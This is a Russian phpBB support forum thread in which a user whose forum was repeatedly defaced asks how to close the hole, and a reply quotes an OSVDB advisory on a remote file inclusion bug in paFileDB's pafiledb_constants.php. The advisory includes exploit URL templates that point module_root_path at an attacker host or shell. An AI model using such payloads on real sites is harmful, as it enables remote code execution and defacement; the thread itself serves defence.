Уважаемые пользователи!
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.
Взломали форум
-
- phpBB 1.4.4
- Сообщения: 114
- Стаж: 18 лет 2 месяца
Взломали форум
Ребят, уже стандартная ситуация, взломали форум, удаляя файлы index.php и вставляя свой index.htm.
Уже который раз взламывают, так в этот раз написали вот что в индексе:
Own3d By PoisoN SaN 100% MeXiCaNo
www.diosdelared.com/foro
SaLuDoS A FiNcH ( JazmiN ) ESPECIALMENTE
ADMIN FUCK OFF YOUR BUG IS IN..
http://www.forum.pedis.ru//pafiledb/inc ... root_path=
REMOTE FILE INCLUSION ( RFI )
Я так понял, что они дали подсказку, через что сломали.
Подскажите плиз, что и где залатать....[/i]
Уже который раз взламывают, так в этот раз написали вот что в индексе:
Own3d By PoisoN SaN 100% MeXiCaNo
www.diosdelared.com/foro
SaLuDoS A FiNcH ( JazmiN ) ESPECIALMENTE
ADMIN FUCK OFF YOUR BUG IS IN..
http://www.forum.pedis.ru//pafiledb/inc ... root_path=
REMOTE FILE INCLUSION ( RFI )
Я так понял, что они дали подсказку, через что сломали.
Подскажите плиз, что и где залатать....[/i]
-
- Former team member
- Сообщения: 3739
- Стаж: 18 лет 9 месяцев
- Поблагодарили: 3 раза
-
- phpBB 1.4.4
- Сообщения: 114
- Стаж: 18 лет 2 месяца
-
- Former team member
- Сообщения: 3739
- Стаж: 18 лет 9 месяцев
- Поблагодарили: 3 раза
-
- phpBB 1.4.2
- Сообщения: 68
- Стаж: 16 лет 8 месяцев
- Откуда: Санкт-Петербург
-
- phpBB 2.0.0
- Сообщения: 227
- Стаж: 18 лет 9 месяцев
-
- phpBB 1.4.4
- Сообщения: 114
- Стаж: 18 лет 2 месяца
-
- Former team member
- Сообщения: 3739
- Стаж: 18 лет 9 месяцев
- Поблагодарили: 3 раза
-
- phpBB Guru
- Сообщения: 16367
- Стаж: 17 лет 11 месяцев
- Откуда: Красноярск
- Благодарил (а): 521 раз
- Поблагодарили: 1744 раза
Neonaft писал(а):Я просто не понимаю, где именно в этом файле дыра.
paFileDB pafiledb_constants.php module_root_path Variable Remote File Inclusion
OSVDB ID: 25507
Disclosure Date: May 9, 2006
Description:
paFileDB contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to includes/pafiledb_constants.php not properly sanitizing user input supplied to the "module_root_path" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
Vulnerability Classification:
Remote/Network Access Required
Input Manipulation
Loss Of Integrity
Exploit Available
Web Related
Products:
mxBB Portal paFileDB Unknown or Unspecified
Solution:
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
Manual Testing Notes:
http://[target]/[phpBBpath]/[pafiledbpath]/includes/pafiledb_constants.php?module_root_path=http://[attacker]
Exploit: http://[site]/[path]/modules/mx_pafiledb/pafiledb/includes/pafiledb_constants.php?module_root_path=[Shell]
-
- phpBB 1.4.4
- Сообщения: 114
- Стаж: 18 лет 2 месяца
-
- phpBB 2.0.0
- Сообщения: 227
- Стаж: 18 лет 9 месяцев
-
- phpBB 2.0.0
- Сообщения: 227
- Стаж: 18 лет 9 месяцев
-
- phpBB 1.4.4
- Сообщения: 114
- Стаж: 18 лет 2 месяца